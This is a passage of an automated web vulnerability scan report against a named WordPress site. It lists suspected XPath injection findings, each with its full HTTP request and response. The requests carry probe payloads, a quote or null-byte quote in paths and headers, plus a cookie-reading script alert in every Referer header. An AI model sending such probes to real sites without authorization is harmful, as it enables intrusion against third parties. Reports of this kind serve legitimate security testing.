Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:25 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.53. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 4, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js'/mootools.bgiframe.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:37 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:37 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.54. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 5, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:57 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.55. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:16:27 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:16:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.56. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js?1'=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:15:31 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:15:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.57. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content'/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:59 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.58. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes'/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.59. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp'/js/rokbox/themes/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:22 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.60. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 4, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js'/rokbox/themes/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:33 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:34 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.61. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 5, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox'/themes/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:45 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:45 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.62. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The REST URL parameter 6 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 6, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes'/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:57 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:57 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.63. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The REST URL parameter 7 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 7, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx'/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:19:08 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:19:09 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.64. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The REST URL parameter 8 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 8, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:19:11 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:19:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.65. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:15 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
